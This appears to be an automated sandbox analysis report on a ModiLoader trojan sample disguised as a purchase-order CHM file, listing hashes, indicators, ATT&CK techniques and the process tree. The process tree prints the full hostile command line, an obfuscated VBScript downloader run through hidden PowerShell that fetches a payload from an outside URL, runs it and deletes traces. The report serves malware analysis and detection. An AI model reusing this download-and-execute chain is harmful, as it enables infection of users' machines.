modiloader | c9385f9be9ce63aada94ced7076bada0b3b46ac3ceef3d55f09d9330a1f07b7b

Analysis

max time kernel
122s
max time network
124s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
21-01-2025 10:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UPDATED_PO_9587483.chm
Size

75KB
MD5

be84e4cc5be9f94fa761fc67afa8fe80
SHA1

7d3ef8e6e17a398631896d46458ba6c35f6467da
SHA256

c9385f9be9ce63aada94ced7076bada0b3b46ac3ceef3d55f09d9330a1f07b7b
SHA512

87be82fc1488af34b4eb868ad0628c642259358f229a8370bed02ea27efdccec9ed3def768c17627c3a7cc3cbb447e06e7fa8c565a246244bad2d97d3267bce0
SSDEEP

1536:skQ/2F/Efsls403Pacb99MdsTEnmmqdHB3fmMwIUGlGgOtrI7mI:nQelsVyu5sYb3VOS7mI

Score

10^/10

modiloader defense_evasion discovery execution persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 62 IoCs

resource	yara_rule
behavioral1/memory/2960-61-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-69-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-107-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-106-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-108-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-104-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-101-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-97-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-95-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-93-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-90-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-87-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-83-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-79-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-78-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-75-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-74-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-141-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-139-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-137-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-72-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-134-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-131-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-129-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-127-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-124-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-71-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-121-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-119-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-116-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-70-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-113-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-110-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-111-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-109-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-102-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-105-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-103-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-100-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-99-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-98-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-96-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-94-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-91-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-92-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-66-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-89-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-88-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-85-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-86-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-84-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-82-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-81-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-80-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-77-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-76-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-64-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-73-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-68-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-67-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-65-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2
behavioral1/memory/2960-63-0x00000000030E0000-0x00000000040E0000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2664	powershell.exe
1616	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
2696	ript.exe
2960	x.exe
3064	svchost.pif
2840	svchost.pif
2664	xbnitqnH.pif

Loads dropped DLL 6 IoCs

pid	Process
2664	powershell.exe
2664	powershell.exe
2664	powershell.exe
2664	powershell.exe
2960	x.exe
2960	x.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hnqtinbx = "C:\\Users\\Public\\Hnqtinbx.url"	x.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2708	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
10	drive.google.com
8	drive.google.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2960 set thread context of 2664	2960	x.exe	49

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
908	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Modifies system certificate store 2 TTPs 2 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	ript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ript.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2960	x.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2664	powershell.exe
1616	powershell.exe
1616	powershell.exe
1616	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	908	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2640	hh.exe
2640	hh.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2640 wrote to memory of 2708	2640	hh.exe	30
PID 2640 wrote to memory of 2708	2640	hh.exe	30
PID 2640 wrote to memory of 2708	2640	hh.exe	30
PID 2708 wrote to memory of 2772	2708	cmd.exe	32
PID 2708 wrote to memory of 2772	2708	cmd.exe	32
PID 2708 wrote to memory of 2772	2708	cmd.exe	32
PID 2708 wrote to memory of 2664	2708	cmd.exe	33
PID 2708 wrote to memory of 2664	2708	cmd.exe	33
PID 2708 wrote to memory of 2664	2708	cmd.exe	33
PID 2664 wrote to memory of 2696	2664	powershell.exe	34
PID 2664 wrote to memory of 2696	2664	powershell.exe	34
PID 2664 wrote to memory of 2696	2664	powershell.exe	34
PID 2708 wrote to memory of 1616	2708	cmd.exe	36
PID 2708 wrote to memory of 1616	2708	cmd.exe	36
PID 2708 wrote to memory of 1616	2708	cmd.exe	36
PID 1616 wrote to memory of 2544	1616	powershell.exe	37
PID 1616 wrote to memory of 2544	1616	powershell.exe	37
PID 1616 wrote to memory of 2544	1616	powershell.exe	37
PID 2544 wrote to memory of 2812	2544	cmd.exe	39
PID 2544 wrote to memory of 2812	2544	cmd.exe	39
PID 2544 wrote to memory of 2812	2544	cmd.exe	39
PID 2708 wrote to memory of 908	2708	cmd.exe	40
PID 2708 wrote to memory of 908	2708	cmd.exe	40
PID 2708 wrote to memory of 908	2708	cmd.exe	40
PID 2544 wrote to memory of 2960	2544	cmd.exe	41
PID 2544 wrote to memory of 2960	2544	cmd.exe	41
PID 2544 wrote to memory of 2960	2544	cmd.exe	41
PID 2544 wrote to memory of 2960	2544	cmd.exe	41
PID 2960 wrote to memory of 1244	2960	x.exe	43
PID 2960 wrote to memory of 1244	2960	x.exe	43
PID 2960 wrote to memory of 1244	2960	x.exe	43
PID 2960 wrote to memory of 1244	2960	x.exe	43
PID 2960 wrote to memory of 1956	2960	x.exe	45
PID 2960 wrote to memory of 1956	2960	x.exe	45
PID 2960 wrote to memory of 1956	2960	x.exe	45
PID 2960 wrote to memory of 1956	2960	x.exe	45
PID 2960 wrote to memory of 2664	2960	x.exe	49
PID 2960 wrote to memory of 2664	2960	x.exe	49
PID 2960 wrote to memory of 2664	2960	x.exe	49
PID 2960 wrote to memory of 2664	2960	x.exe	49
PID 2960 wrote to memory of 2664	2960	x.exe	49
PID 2960 wrote to memory of 2664	2960	x.exe	49

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\UPDATED_PO_9587483.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:2772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:2696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1616
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2544
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:2812
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of WriteProcessMemory
        
        PID:2960
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Public\HnqtinbxF.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1244
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\Users\Public\Libraries\FX.cmd
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1956
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        
        PID:3064
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        
        PID:2840
      - C:\Users\Public\Libraries\xbnitqnH.pif
        
        C:\Users\Public\Libraries\xbnitqnH.pif
        6⤵
        Executes dropped EXE
        
        PID:2664
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
1.1MB

MD5
c15a0b6a74a87abc9533dab28da2a265

SHA1
6b4cbea1cef889fc389ee5c4a64b0b398db9bff8

SHA256
1f14a5e807a9ad44eb674253b96253197557d1894fb43699ebef6ff61ca10bb0

SHA512
350f79cb5901158917fbd3fdc53cd5884dc0037619602798269f2c4ae946e3e16051bece2e9f2d077e4753de7f5acd197fc1504f67f1e07b7ae98f51c0f96a54

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
544cc938ba1ee33a424035e2fa0feb5e

SHA1
f99a14219b0207291590f4cee6796dfd490b0c1f

SHA256
f87125a6f16ea93662635790c058c388efdd4aef5784ac1497435a05e605e5a2

SHA512
e5e12a93c6ca89eb07bd30e223e0b84cbe129613616d0fa43841a0f55e050e43597dd00a978d75c51828dcc9e67a2818ab121f8a4725d69e2e489ed644855050

Download Submit
C:\Users\Public\HnqtinbxF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\Libraries\xbnitqnH.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\df.cmd

Filesize
1.1MB

MD5
b5efdb0c256d97ec94e22383130fc0e0

SHA1
1fc639f4c83b736d0832229f37c6bffd41d3490d

SHA256
49a81014ca3b319235ee378de6148efc76e1a5761913e4147f508a2c9ad7a8ce

SHA512
5e4e615c5e8c2c10fd1d3339af594fd46aafe2cd92dd43572c8a51fb5a3a411a8c76ae9e384f94ab994524894ec15051b1c5ad54540edce354219d5e89a70075

Download Submit
C:\Users\Public\ript.exe

Filesize
152KB

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
memory/1616-52-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/1616-51-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2664-25-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2664-26-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/2960-119-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-109-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-104-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-101-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-97-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-95-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-93-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-90-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-87-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-83-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-79-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-78-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-75-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-74-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-141-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-139-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-137-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-72-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-134-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-131-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-129-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-127-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-124-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-71-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-121-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-106-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-116-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-70-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-113-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-110-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-111-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-108-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
memory/2960-102-0x00000000030E0000-0x00000000040E0000-memory.dmp

Filesize
16.0MB

Download
